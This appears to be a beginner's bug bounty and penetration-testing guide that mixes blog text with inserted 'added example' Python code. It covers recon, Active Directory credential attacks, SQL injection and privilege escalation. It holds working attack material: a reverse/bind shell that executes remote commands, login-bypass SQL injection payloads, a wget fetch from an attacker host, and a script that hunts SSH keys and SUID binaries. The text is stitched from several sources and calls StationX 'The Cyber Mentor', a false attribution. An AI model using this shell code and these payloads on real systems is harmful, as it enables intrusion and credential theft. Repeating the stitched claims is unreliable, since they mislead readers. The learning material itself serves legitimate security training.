Hello All Hackers !! Here is a guide to get started with Bug Bounty


A bug bounty program is a deal offered by many websites and software developers by which individuals can receive recognition and compensation for reporting bugs, especially those pertaining to exploits and vulnerabilities. These programs allow the developers to discover and resolve bugs before the general public is aware of them, preventing incidents of widespread abuse.

People who want to get into bug bounty come from different backgrounds: some are completely new to web development with little prior programming experience, some are experienced web developers with no security background, and some are skilled cybersecurity professionals. The steps below are the same for everyone; you can skip one or more of them depending on your skills and experience.

Let’s get started with these steps:

1. Learn Computer Networking:

A decent knowledge of computer networks is necessary for getting started with bug bounty. You do not need to be a networking expert, but you should be comfortable with the fundamentals: how inter-networking works, IP and MAC addresses, the OSI and TCP/IP stacks, and so on. You can learn these from quality online resources such as the GeeksforGeeks Computer Networks tutorials.

2. Get Familiar With Web Technologies: This means a basic understanding of web programming and web protocols. On the client side that is HTML, CSS and JavaScript; beginner to intermediate proficiency is more than enough at the start. The protocols you should understand are HTTP, TLS, FTP, etc. These can be learned from the corresponding RFCs or from the many offline and online resources available.

3. Learn Web Application Security Measures and Hacking Techniques: This includes learning about common security mechanisms and practices, how they are bypassed, the common vulnerabilities in web applications, how to find them, and how to patch and prevent them. Useful resources are:

  • Recommended Books:
    • The Web Application Hacker's Handbook
    • Mastering Modern Web Application Penetration Testing
    • Web Hacking 101

4. Practicing and Polishing Your Skills: Practicing helps in developing a framework for approaching a target. The more you practice on diverse targets of different difficulty levels the easier it will be for you to approach a web application in a way that increases your chances of finding a critical vulnerability (or even finding a vulnerability if the application is well secured and has been already tested by many hunters). Try making great use of these resources:

  • Vulnerable Web Applications: These are intentionally vulnerable virtual machines or web app packages. They come as general variants that contain many types of vulnerabilities and as dedicated variants that focus on a single vulnerability and its subtleties. Some examples are:
    • bWAPP
    • DVWA (Damn Vulnerable Web Application)
    • OWASP WebGoat
    • Cyclone Transfers
    • Bricks
    • Butterfly Security Project
    • Hacme
    • OWASP Juice Shop
    • RailsGoat
    • SQLol

bWAPP, DVWA and WebGoat are the best for beginners.

5. Testing Real Targets: After you are thorough with your basics and have a decent level of skill, you can start doing the actual hunting on real websites. A lot of websites run bug bounty programs for their web assets. Some big names are:

  • Facebook
  • Twitter
  • Google
  • Verizon
  • Starbucks
  • Shopify
  • Spotify
  • Apple

These companies reward generously but finding a security bug on any of their assets is highly difficult due to tough competition. You must remember that the top bug bounty hunters of the world are testing these websites along with you. However, that doesn’t mean you can’t find something at all.

6. Staying Current on Latest Vulnerabilities: For this, you can follow elite researchers and learn from their work. You can also read disclosed reports on bug bounty platforms like HackerOne. Some recommended researchers to follow are:

  • Frans Rosén
  • Jason Haddix
  • Geekboy
  • PortSwigger
  • Jobert Abma

Whatever your academic background or current working domain, if you really want to get started with bug bounty you can simply start learning the required skills and tools and begin the actual hunting.

Different types of programs

Vulnerability Disclosure Program (VDP)

  • Typically these programs are public and only reward you with points and nothing more, although some VDPs are also private. Most people starting in bug bounties are told to begin with VDPs to 'learn the ropes' and build 'rep' (reputation) so they receive private invites that pay. What many researchers don't realise is that some of these VDP programs also have paying programs; they are just private and invite only.
  • With that said, not all companies are able to run more than a VDP, for a variety of reasons such as being a charity. Just because a company runs a VDP doesn't mean you should ignore it; be mindful about who you are working with and why they run a VDP, then decide whether to spend time on their program. Practising on VDPs is a great way to get first-hand experience of what it's like to participate in bug bounties and hack blindly on real-world websites. It is also not unheard of to be invited to a company's paying program after impressing them in their VDP, but whether that is worth it depends on your risk vs. reward ratio. You're the shot caller.

Public Bug Bounty Program

  • A public bug bounty program, such as Google's or Facebook's, is open to the whole world and rewards money. There are LOTS of public bug bounty programs out there and some have wide scopes. You can discover public programs from Disclose.IO, but also search on Google to find more companies that welcome hackers; the Google dorks below help with that.
  • Most people are under the illusion that just because a program is public there will be nothing to find. False! New code and new features are pushed daily, especially at a large company spanning the world.
  • Also consider: if most researchers avoid these programs because they think too many eyes are on them, there are probably fewer eyes than they think. Get creative, there are bugs out there.

Private Bug Bounty Program

  • Typically most private invites you receive will be for paying programs, but not all private programs pay. You can usually customise your invite preferences on bug bounty platforms to filter paying from non-paying private programs. Researchers are usually invited to private programs after showing activity on the platform: a certain number of valid bugs, a certain rep/signal/impact value, and activity within a given number of days.
  • You may hear some researchers refer to “VIP” and “secret” programs and these are programs setup by certain companies to work only with hackers they select. There is not usually a public criteria to join one of these and you are mostly selected based on your activity on their other program(s) & your skill.

Notice Board: Google has lots of information indexed that can help you find external programs as well as information relating to your specified company. There are lots of queries you could search for, however here are some popular search queries: (don’t forget to try different languages!).

inurl:responsible disclosure

"report security vulnerability"

"vulnerability disclosure"

"responsible vulnerability disclosure"

disclose vulnerability "company"

"powered by hackerone" "submit vulnerability report"

intext:bug bounty|vulnerability disclosure

inurl: bug bounty

"vulnerability reward"

white hat program

"vulnerability reporting policy"

inurl:responsible-disclosure-policy

Methodology

Start with Methodology because I think building your Methodology is one of the most important things. It helps to stay organized and going through a certain set of steps helps me. On every CTF that you practice on, you will refine your Methodology .

If you want to learn about Methodology, check out Jason Haddix’s video. There are tons of material out there regarding the Hacking methodology.

The importance of Notes

Taking good notes as a hacker, pentester or bug hunter is crucial. You will work with your notes open at all times.

Own your notes, keep them organized, refine them and learn to love them.

Reconnaissance

Learn a ton about doing good reconnaissance. The more stuff you gather the easier it is for you to get access. If you slack in recon, you’ll struggle at executing later.

Passive Reconnaissance Tools

Target Validation

  • WHOIS Lookup
  • nslookup
  • dnsrecon

Subdomain Enumeration

Fingerprinting

  • Nmap
  • Wappalyzer
  • WhatWeb
  • BuiltWith
  • Netcat

Data Breaches

That’s a lot of stuff to wrap your head around. You pick what works for you and integrate it into your Methodology.

Active Directory

Let me summarize:

General AD Stuff

  • The AD DS data store
  • The Ntds.dit file (stores the domain's password hashes)

SAM Hashes

  • Local User hashes

Kerberos

  • How Kerberos works

Top Five Ways to get Domain Admin before Lunch

Domain Enumeration

  • PowerView

Gaining Domain Access

  • A tool that downloads domain data and visualizes it. Very useful.

Pass the Hash Attacks

  • NTLM vs. NTLMv2
  • NT hashes (the values stored in the SAM and in NTDS.dit) can be passed; Net-NTLMv2 challenge responses captured on the wire cannot, because they are bound to a server challenge. Those can only be cracked offline or relayed.

Crackmapexec

  • Needs credentials (a password or an NT hash) to work; it sprays them against other services/machines to see where they are valid.
  • Use psexec.py to connect with a gathered hash.

secretsdump.py

  • Impacket script used to dump hashes (SAM, LSA secrets, NTDS.dit) from a host you have credentials or a hash for.

Mitigation of Pass The Hash attacks

  • Limit Account Re-Use
  • Strong Passwords
  • Privilege Access Management

Token Impersonation

What are tokens?

Temporary keys that allow you access to a system/network without having to provide credentials each time you access a file. “Cookies for computers”

Token Impersonation Attack

  • Requires a valid username + password for a machine; the tokens of other users logged on to that machine can then be impersonated (administrative privileges on that host are needed to do so)

Kerberoasting

  • Using Impacket (GetUserSPNs.py requests service tickets for accounts that have an SPN; the tickets are then cracked offline)
  • Needs a user account with credentials to work. It doesn't need to be an admin account.

GPP / cPassword Attacks

  • Always worth checking for, especially on older servers. Group Policy Preferences stored passwords in SYSVOL as cPassword values encrypted with a key Microsoft published, so anyone who can read SYSVOL can decrypt them.
  • Metasploit module -> auxiliary/scanner/smb/smb_enum_gpp

Mimikatz

  • Tool used to dump credentials and hashes of all kinds from Windows
    • SAM hashes
    • Golden Ticket attacks

Active Directory is a huge topic on its own. You have to go through a course to fully understand all of it.

Shells

I don’t know how else to call this, but I feel like this deserves its own section. Running manual exploits usually leaves you with dumb shells, which you generally want to elevate to beautiful shells. I learned a lot about this and it is extremely helpful to have a fully interactive shell compared to a dumb one.

This is an excellent Article about Upgrading Simple Shells to Fully Interactive ones by Ropnop. Read it.

Metasploit

Elevate Dumb Shell to Meterpreter Shells

  • After a dumb shell was created with a Metasploit Exploit hit CTRL + Z to move the shell to the background
  • Type: sessions and note the session ID
  • Type: sessions -u 1 -> This spawns a meterpreter shell if available
  • Type: sessions -i 2 -> To use the newly spawned meterpreter shell

Reverse Shell vs Bind Shell

  • Reverse shell
    • Target connects back to the attacker
  • Bind shell
    • Attacker connects to the target, which listens on a port
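The difference between the two is only which side opens the TCP connection. The following added example (written for this page, not code from the original post or from Metasploit) implements both in Python against loopback so you can watch the direction of the connection: the target side runs the commands it receives either way, but for a bind shell the target listens and for a reverse shell the target calls out to the attacker's listener. The framing marker and the 127.0.0.1 addresses are assumptions for the lab; this is a demonstration, not a payload.

```python
import socket
import subprocess
import threading

# Constructed end-of-output marker so the attacker side knows when a command finished
END = b"<<END>>\n"


def serve_commands(conn):
    """Target side, shared by both shell types: read one command per line,
    run it, send back its output. An empty line closes the session."""
    with conn:
        reader = conn.makefile("rb")
        for line in reader:
            cmd = line.decode(errors="replace").strip()
            if not cmd:
                break
            result = subprocess.run(cmd, shell=True, capture_output=True, timeout=10)
            conn.sendall(result.stdout + result.stderr + END)


def bind_shell(port=0):
    """Bind shell: the TARGET listens and the attacker connects in. Inbound
    firewalls usually stop this. Returns the port the target listens on."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", port))
    srv.listen(1)

    def accept_one():
        conn, _ = srv.accept()
        srv.close()
        serve_commands(conn)

    threading.Thread(target=accept_one, daemon=True).start()
    return srv.getsockname()[1]


def reverse_shell(attacker_host, attacker_port):
    """Reverse shell: the TARGET connects out to the attacker's listener, which
    usually passes egress filtering because it looks like ordinary client traffic."""
    def connect_back():
        serve_commands(socket.create_connection((attacker_host, attacker_port)))

    threading.Thread(target=connect_back, daemon=True).start()


def attacker_listener(port=0):
    """Attacker side of a reverse shell: the equivalent of `nc -lvnp PORT`."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", port))
    srv.listen(1)
    return srv


def wait_for_callback(listener):
    conn, _ = listener.accept()
    listener.close()
    return conn


def connect_to_bind_shell(port):
    return socket.create_connection(("127.0.0.1", port))


def run_remote(conn, cmd):
    """Attacker side: send one command and collect its output."""
    conn.sendall(cmd.encode() + b"\n")
    buf = b""
    while not buf.endswith(END):
        chunk = conn.recv(4096)
        if not chunk:
            break
        buf += chunk
    if buf.endswith(END):
        buf = buf[:-len(END)]
    return buf.decode(errors="replace")


def close_session(conn):
    conn.sendall(b"\n")
    conn.close()


if __name__ == "__main__":
    port = bind_shell()
    c = connect_to_bind_shell(port)            # attacker -> target
    print("bind shell says:", run_remote(c, "echo hello from bind shell").strip())
    close_session(c)

    listener = attacker_listener()
    reverse_shell("127.0.0.1", listener.getsockname()[1])
    c = wait_for_callback(listener)            # target -> attacker
    print("reverse shell says:", run_remote(c, "echo hello from reverse shell").strip())
    close_session(c)
```

In a real engagement the target-side functions are what a payload does and the attacker-side ones are what nc or a Metasploit handler does; the point of running both on loopback is to see that the command channel is identical and only the connect direction changes.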

If Username + Password are available

  • Create Meterpreter Shell from scratch with exploit/windows/smb/psexec

Impacket

Can also be used to create Shells

  • smbexec.py
  • wmiexec.py
  • psexec.py

Transferring Files

When exploiting servers, you will most likely find yourself in a situation where you want to upload a tool or an exploit to the server, or download files from the server to your attacking machine. I learned a couple of techniques that help with that.

  • SimpleHTTPServer (Python 2; on Python 3 the same thing is python3 -m http.server)
    • Pre-installed on Kali
    • Starts an HTTP server on port 8000 in the current directory, which other hosts on the network can use to fetch files.
    • On the target, use: wget http://ipofattacker:8000/unix-privesc-check.tar to download files
  • Certutil
  • Pyftpdlib
  • SSH

I like this method a lot if you have an SSH user on the target:

  • scp /path/to/file username@IP:/path/to/destination
  • Use pwd on the target to find the correct destination directory
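The stock http.server only covers the attacker-to-target direction. Here is an added example (not from the original post, and not part of Python's http.server) of the small upload-capable variant I keep around for the other direction: GET behaves exactly like python3 -m http.server, and PUT stores the request body in the served directory so the target can push files back with curl -T file http://attacker:8000/. Loopback addresses, the loot.txt name and the file contents are assumptions for the demo; the safe_name() check exists because anything that accepts uploads must not let the client choose a path.

```python
import functools
import http.server
import pathlib
import socketserver
import tempfile
import threading
import urllib.parse
import urllib.request


def safe_name(request_path):
    """Reduce the request path to a bare file name so a PUT cannot escape the
    upload directory ('/../../etc/passwd' -> 'passwd'). Returns None if unusable."""
    path = urllib.parse.unquote(request_path.split("?", 1)[0])
    name = pathlib.PurePosixPath(path).name
    if name in ("", ".", "..") or "/" in name or "\\" in name:
        return None
    return name


class UploadHandler(http.server.SimpleHTTPRequestHandler):
    """GET: serve files from the directory (downloads to the target).
    PUT: store the body under the directory (uploads from the target)."""

    def do_PUT(self):
        name = safe_name(self.path)
        if name is None:
            self.send_error(400, "bad file name")
            return
        length = int(self.headers.get("Content-Length", "0"))
        (pathlib.Path(self.directory) / name).write_bytes(self.rfile.read(length))
        self.send_response(201)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, fmt, *args):  # keep the demo output quiet
        pass


def start_server(directory, port=0):
    """Serve `directory` on 127.0.0.1 in a background thread; returns (server, port).
    On a real engagement bind 0.0.0.0 and pass port=8000."""
    handler = functools.partial(UploadHandler, directory=str(directory))
    httpd = socketserver.ThreadingTCPServer(("127.0.0.1", port), handler)
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    return httpd, httpd.server_address[1]


def upload(url, data):
    """What `curl -T file URL` does on the target."""
    req = urllib.request.Request(url, data=data, method="PUT")
    with urllib.request.urlopen(req) as resp:
        return resp.getcode()


def download(url):
    """What `wget URL` does on the target."""
    with urllib.request.urlopen(url) as resp:
        return resp.read()


def demo():
    """Round trip on loopback: PUT a file through a traversal attempt, then GET it back."""
    with tempfile.TemporaryDirectory() as tmp:
        httpd, port = start_server(tmp)
        try:
            status = upload(f"http://127.0.0.1:{port}/../../loot.txt", b"db_password=hunter2\n")
            on_disk = (pathlib.Path(tmp) / "loot.txt").read_bytes()
            fetched = download(f"http://127.0.0.1:{port}/loot.txt")
        finally:
            httpd.shutdown()
            httpd.server_close()
    return status, on_disk, fetched


if __name__ == "__main__":
    print(demo())
```

Run it as a script to see the round trip; in the field you start start_server() on your box and use curl -T or wget on the target.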

Web

Now to the fun part. You can put your focus on Web because you want to get started with Bug Bounties. Burp deserves a section of its own because it is so widely used in web application testing, but I'll try to summarize as best as I can. I upgraded to Burp Pro since my trial expired. You can use the free Community Edition with limited functionality, which is perfectly fine for the beginning.

The OWASP Top Ten

The OWASP Top 10 is a list of the ten most critical web application security risks. The OWASP Top 10 are going to be a part of every interview you participate in. I actually just went through one, and they asked a ton of OWASP questions. I knew I needed to at least understand the OWASP Top Ten on a high level, so once again, The Cyber Mentor's course helped me a ton to understand them, as he goes over every one of them.

1 — SQL Injection

  • Testing for SQL injection using Burp Intruder
  • Logging in as the admin without authentication using SQL Injection (So much fun)
  • Learning about SQL Injection Payloads and how to use Intruder to test for them
  • Learned how to prevent SQL Injection
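The "log in as admin without authentication" trick and its prevention, as an added example in Python with sqlite3 (not from the original post or from the course it mentions). The user table and the two payloads are constructed; passwords are stored in the clear only to keep the demo short, a real application must store hashes. The vulnerable function concatenates user input into the SQL statement; the safe one uses a parameterised query, so the same payloads are just strings that match no user.

```python
import sqlite3


def make_db():
    """Constructed in-memory user table for the demo."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("admin", "correct horse battery staple", "admin"),
        ("alice", "hunter2", "user"),
    ])
    return db


def login_vulnerable(db, username, password):
    """Builds the statement with string formatting, so input is parsed as SQL.
    Returns (username, role) of the first matching row or None."""
    query = ("SELECT username, role FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return db.execute(query).fetchone()


def login_safe(db, username, password):
    """Parameterised query: the driver passes the values separately from the
    statement text, so quotes and comment markers in them have no SQL meaning."""
    return db.execute(
        "SELECT username, role FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()


# Two classic payloads to try in Burp Repeater / Intruder (constructed examples)
COMMENT_OUT_PASSWORD = "admin'-- "      # username field: closes the quote, comments out the password check
ALWAYS_TRUE_PASSWORD = "' OR '1'='1"    # password field: makes the WHERE clause true for every row


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, comment payload:", login_vulnerable(db, COMMENT_OUT_PASSWORD, "whatever"))
    print("vulnerable, always-true payload:", login_vulnerable(db, "nobody", ALWAYS_TRUE_PASSWORD))
    print("safe, comment payload:", login_safe(db, COMMENT_OUT_PASSWORD, "whatever"))
    print("safe, always-true payload:", login_safe(db, "nobody", ALWAYS_TRUE_PASSWORD))
    print("safe, real credentials:", login_safe(db, "alice", "hunter2"))
```

When you test a real login form, the first payload is the one to send through Intruder with a list of quote/comment variants; a different response for "admin'-- " than for "admin'" is the signal to switch to Repeater.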

2 — Broken Authentication

  • Enumerate users or emails through improperly configured login forms
  • Abuse forgot password forms for user enumeration

3 — Sensitive Data Exposure

  • Looking through all kinds of folders on a website in Burp
  • Searching for Keys
  • Checking Security Headers
  • Testing SSL with Nmap’s ssl-enum-ciphers script
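Checking security headers is the kind of thing worth scripting once, so here is an added example (written for this page, not code from the original post or from Burp) that parses a raw HTTP response and reports the headers a hunter looks for: HSTS and its max-age, CSP, X-Content-Type-Options, clickjacking protection, and version disclosure in Server / X-Powered-By. Both responses are constructed, not captured from any real site; the one-year HSTS threshold is the usual recommendation, not a standard requirement.

```python
import re

# Constructed responses: a weak one and a hardened one (not from any real host)
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.29 (Ubuntu)\r\n"
    "X-Powered-By: PHP/7.2.24\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "Strict-Transport-Security: max-age=300\r\n"
    "\r\n"
    "<html>...</html>"
)
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "Strict-Transport-Security: max-age=63072000; includeSubDomains; preload\r\n"
    "Content-Security-Policy: default-src 'self'; frame-ancestors 'none'\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "Referrer-Policy: no-referrer\r\n"
    "\r\n"
)
ONE_YEAR = 31536000


def parse_headers(raw_response):
    """Header block of a raw response as a dict keyed by lower-cased name."""
    headers = {}
    for line in raw_response.replace("\r\n", "\n").split("\n")[1:]:  # skip status line
        if not line.strip():
            break  # blank line ends the headers
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def audit_headers(headers):
    """List of findings; an empty list means every check passed."""
    h = {k.lower(): v for k, v in headers.items()}
    findings = []
    hsts = h.get("strict-transport-security")
    if hsts is None:
        findings.append("missing Strict-Transport-Security")
    else:
        m = re.search(r"max-age=(\d+)", hsts, re.I)
        if not m or int(m.group(1)) < ONE_YEAR:
            findings.append("Strict-Transport-Security max-age below one year")
    csp = h.get("content-security-policy", "")
    if not csp:
        findings.append("missing Content-Security-Policy")
    if h.get("x-content-type-options", "").strip().lower() != "nosniff":
        findings.append("missing X-Content-Type-Options: nosniff")
    xfo = h.get("x-frame-options", "").strip().upper()
    if xfo not in ("DENY", "SAMEORIGIN") and "frame-ancestors" not in csp:
        findings.append("no clickjacking protection (X-Frame-Options or frame-ancestors)")
    for name in ("server", "x-powered-by"):
        if name in h and re.search(r"\d", h[name]):
            findings.append(f"version disclosure in {name}: {h[name]}")
    return findings


if __name__ == "__main__":
    for label, raw in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_headers(parse_headers(raw)) or "no findings")
```

Paste a response from Burp's Repeater into parse_headers() and you get the list of things to mention in the report; missing headers alone are usually low severity, but the version disclosure is the lead for step 9 below.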

4 — XXE (XML External Entities)

  • XXE Payloads
  • Trying XML payload uploads and checking in Burp what is returned
  • How to prevent XXE

5 — Broken Access Control

  • Checking HTML code for hidden forms or fields, etc.
  • Unauthenticated access to restricted areas

6 — Security Misconfiguration

  • One of the most common issues
  • Result of insecure configurations
  • Outdated libraries or services

7 — XSS (Cross-Site Scripting)

  • I ❤ XSS
  • XSS Payloads
  • How to test for XSS using Burp
  • Different Types of XSS (Stored, Reflected, DOM)
  • How to prevent XSS

8 — Insecure Deserialization

  • Rather uncommon and hard to exploit
  • Can lead to RCE when it is exploitable

9 — Using Components with Known Vulnerabilities

  • Learned how to scan for those using Burp extensions
  • Struts 2

10 — Insufficient Logging & Monitoring

  • Lets attackers maintain access or pivot through the environment without being noticed
  • Brute Force undetected
  • Failing to detect breaches

Knowing the OWASP Top 10 is essential for doing Bug Bounties. Period. You have to have those down and then take your study further from there.

Other Web Stuff

  • Burp Suite
    • Most popular tool for Bug Bounties (literally everyone uses Burp)
    • General stuff
      • Learned all the basic functionality
      • Learned what all the different tabs do
      • Learned how to read traffic
      • Learned about scopes
      • Learned how to recognize successful fuzzing attempts

Intruder

  • Burp Intruder can be used to attack all kinds of forms
  • You can run brute-force attacks using Burp Intruder
  • You can test for XSS, SQL Injection and Fuzz all the things with Intruder
  • Credential Stuffing

Repeater

  • Repeater allows you to modify requests and send them to the server

Extender

  • Lots of Burp Addons are available to install

Decoder

  • Allows you to decode stuff (base64 for example) right in Burp

I feel like this is just a small part of what Burp is, but it would get out of hand to put everything in here now. I will add to it in the following Blog posts in greater detail.

Directory Brute-Force

  • Using Gobuster or Dirbuster
  • Very important to find hidden files, dev sites, or generally get an overview of a websites folder hierarchy

Subdomain Enumeration

  • As previously mentioned in Passive Reconnaissance, very important in bug bounties to find hidden subdomains, dev subdomains, etc.
  • OWASP Amass
  • Sublist3r
  • crt.sh
  • Assetfinder
  • Httprobe
  • Gowitness
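Most of these tools end up chained the same way: pull names from a source such as crt.sh, de-duplicate them, drop everything the program's scope does not cover, and hand the rest to httprobe. Here is an added example (not from the original post, and not code from any of the tools listed) of the parsing and scope-filtering step in Python, covering both this section and the Subdomain Enumeration heading under Passive Reconnaissance. The JSON is a constructed stand-in for what https://crt.sh/?q=%25.example.com&output=json returns; the scope patterns are made up.

```python
import fnmatch
import json
import re

# Constructed stand-in for crt.sh JSON output; not real certificate data.
SAMPLE_CRTSH_JSON = json.dumps([
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3", "name_value": "dev.example.com\nwww.example.com"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3", "name_value": "*.example.com"},
    {"issuer_name": "C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1", "name_value": "API.Example.com"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3", "name_value": "staging.example.com\nexample.com"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3", "name_value": "example.com.evil.net"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3", "name_value": "dev.example.com"},
])

HOSTNAME_RE = re.compile(r"^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z0-9-]{2,63}$")


def subdomains_from_crtsh(raw_json, domain):
    """Unique, lower-cased hostnames under `domain` from crt.sh JSON.
    Wildcard entries contribute their base name; names that merely contain the
    domain (example.com.evil.net) are dropped. One name_value may hold several
    newline-separated names."""
    domain = domain.lower()
    found = set()
    for entry in json.loads(raw_json):
        for name in entry.get("name_value", "").splitlines():
            name = name.strip().lower().lstrip("*.")
            if HOSTNAME_RE.match(name) and (name == domain or name.endswith("." + domain)):
                found.add(name)
    return sorted(found)


def in_scope(host, in_scope_patterns, out_of_scope_patterns=()):
    """Scope check using the wildcard notation program pages use ('*.example.com').
    Exclusions win over inclusions. Do not test anything that fails this."""
    host = host.lower()
    if any(fnmatch.fnmatchcase(host, p.lower()) for p in out_of_scope_patterns):
        return False
    return any(fnmatch.fnmatchcase(host, p.lower()) for p in in_scope_patterns)


def scoped_targets(raw_json, domain, in_scope_patterns, out_of_scope_patterns=()):
    """crt.sh JSON -> unique names -> scope filter -> list to feed into httprobe."""
    return [h for h in subdomains_from_crtsh(raw_json, domain)
            if in_scope(h, in_scope_patterns, out_of_scope_patterns)]


if __name__ == "__main__":
    # Sample program scope (assumed): all subdomains, staging excluded
    for host in scoped_targets(SAMPLE_CRTSH_JSON, "example.com",
                               ["*.example.com"], ["staging.example.com"]):
        print(host)   # one per line, ready for: python3 this.py | httprobe
```

Note that "*.example.com" in a scope page usually does not include the apex; in_scope() follows that reading, so example.com itself is only a target if the program lists it explicitly.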

Enumerating Web Tech

  • How websites are built
  • Wappalyzer Firefox Addon
  • WhatWeb (Kali Tool)

Now there is a lot more I could go over, but I feel like it makes more sense going a bit more in-depth into those topics in future blog posts.

One last thing I want to mention, though, is what I have learned from Hackthebox within this time.

Stuff you can learn from Hackthebox

I use Hackthebox almost exclusively as a practice resource next to actual bug bounties.

Because this post is already becoming a behemoth and potentially the longest article I have written on here, I will keep the last month’s “what I’ve learned from Hackthebox” in an easily digestible bullet point format.

Privilege Escalation

Redis

Learn what Redis is and how to exploit it

SSH keys

  • Learned a ton about SSH keys and how to exploit them
  • Also learned how to crack them if a weak password is used

Exploits

  • Learned how to use manual exploits
  • Learned how to read exploits
  • Learned that I need to decode some exploits so they work on Linux with dos2unix
  • Example on Kali: dos2unix 47681.sh

Bash

  • Learn how exploit scripts written in Bash use ${} placeholder values that you have to fill in

Enumerate

  • Enumerate all the things.
  • If you are stuck, enumerate some more.
  • Look through all folders on a server:
    • Check .ssh folders
    • Check /opt/ folders
    • Check /home/ folders
    • Check folders and config files of installed services

Did I mention to enumerate some more?
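The folder checklist above is easy to turn into a script that you can drop onto a box. This added example (written for this page, not from the original post or from any privesc enumeration tool) walks a directory tree and reports readable SSH keys and other secrets, SUID binaries, and world-writable configuration files or scripts. It checks the mode bits instead of os.access() so the result is the same whether you run it as root or as a low-privileged user. The sample tree it builds for the demo is constructed in a temporary directory; on a target you would call enumerate_tree("/").

```python
import os
import pathlib
import stat
import tempfile

SECRET_FILE_NAMES = {"id_rsa", "id_dsa", "id_ecdsa", "id_ed25519", "authorized_keys",
                     ".bash_history", ".mysql_history", ".env", "wp-config.php", "config.php"}
CONFIG_SUFFIXES = (".conf", ".cfg", ".ini", ".yml", ".yaml", ".sh", ".py")


def enumerate_tree(root):
    """Walk `root` and return sorted (finding, relative path) pairs."""
    root = pathlib.Path(root)
    findings = []
    for path in root.rglob("*"):
        try:
            mode = path.lstat().st_mode
        except OSError:
            continue
        if stat.S_ISLNK(mode):
            continue
        rel = path.relative_to(root).as_posix()
        if stat.S_ISREG(mode):
            if path.name in SECRET_FILE_NAMES and mode & stat.S_IROTH:
                findings.append(("world-readable secret", rel))
            if mode & stat.S_ISUID and mode & stat.S_IXUSR:
                findings.append(("suid binary", rel))
            if mode & stat.S_IWOTH and (rel.startswith("etc/") or rel.endswith(CONFIG_SUFFIXES)):
                findings.append(("world-writable config/script", rel))
        elif stat.S_ISDIR(mode) and path.name == ".ssh" and mode & stat.S_IROTH:
            findings.append(("readable .ssh directory", rel))
    return sorted(findings)


def build_sample_tree(base):
    """Constructed mini filesystem for the demo (not a real target)."""
    base = pathlib.Path(base)
    files = {
        "home/alice/.ssh/id_rsa": (b"-----BEGIN OPENSSH PRIVATE KEY-----\n", 0o644),     # too permissive
        "home/alice/.ssh/id_ed25519": (b"-----BEGIN OPENSSH PRIVATE KEY-----\n", 0o600), # fine
        "opt/app/config.yml": (b"db_password: hunter2\n", 0o666),                         # anyone can edit
        "etc/cron.d/backup": (b"* * * * * root /opt/app/backup.sh\n", 0o666),             # root runs what we write
        "usr/bin/tool": (b"#!/bin/sh\n", 0o4755),                                         # SUID
        "var/log/syslog": (b"...\n", 0o644),                                              # nothing interesting
    }
    for rel, (content, mode) in files.items():
        p = base / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(content)
        os.chmod(p, mode)
    os.chmod(base / "home/alice/.ssh", 0o755)
    return base


def demo():
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return enumerate_tree(tmp)


if __name__ == "__main__":
    for kind, rel in demo():
        print(f"{kind:30} {rel}")
```

It deliberately does not try to be LinPEAS; the point is that each line of the checklist maps to one mode-bit test, and that a writable cron file or a readable key is what turns "enumerate some more" into a shell.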

Password Cracking

  • Cracking all kinds of passwords using tools like:
    • Hashcat
    • John the Ripper
    • Hydra
    • Burp Suite

Brute Forcing stuff on CTF’s

  • …Is mostly pointless

Searchsploit

  • Learned how Searchsploit works and how useful it is

Searching for Exploits

  • Google all the Server/Service versions you find through enumeration and look for exploits
  • The key to easy CTF’s

SMB

  • Learned a ton about SMB and the tools for it:
    • nmblookup
    • smbclient
    • nmap
    • rpcclient
    • enum4linux
    • smbmap

Great read on SMB and a great workflow

Ethical Hacking Courses

My favorite Ethical Hacking Courses are the ones created by StationX, who is more widely known as The Cyber Mentor. No course that I have taken online has advanced my skills more than his excellent Ethical Hacking Course, hands down.

Some other great courses are:

  1. THE COMPLETE ETHICAL HACKING COURSE BUNDLE
  2. THE COMPLETE BUG BOUNTY COURSE BUNDLE
  3. THE COMPLETE PYTHON FOR HACKING AND CYBER SECURITY BUNDLE
  4. THE COMPLETE LINUX SKILLS BUNDLE

There is also an option to get access to all courses for $149 per year. I can't recommend StationX enough.

Does this ever end?

Even though I already spent five hours writing this blog post, I feel like we are just scratching the surface. I probably have forgotten to mention several things I’ve learned, but I felt like I needed to initiate this whole series with as much detail as I could.

The next posts will be much more in-depth and we will be going more technical on all the different things.

I hope that this series will find someone’s interest, and in the best, motivate some of you to get started as well. I’m not gonna lie, it is hard. It is hard, but with this blog, I want to show you that it’s possible if you put in the work. I do not come from a background of higher education, I learned everything I know by myself and with the help of the incredible Hacking community. Now is the time to give back, and I hope I can achieve this through this blog.

Notice: some links might be affiliate links. If you purchase anything by clicking them, I might receive a commission.

Reference:

  • How to Get Started With Bug Bounty? (GeeksforGeeks): https://www.geeksforgeeks.org/how-to-get-started-with-bug-bounty/
  • Learn how to get started in bug bounties (BugBountyHunter.com): https://www.bugbountyhunter.com/getting-started/
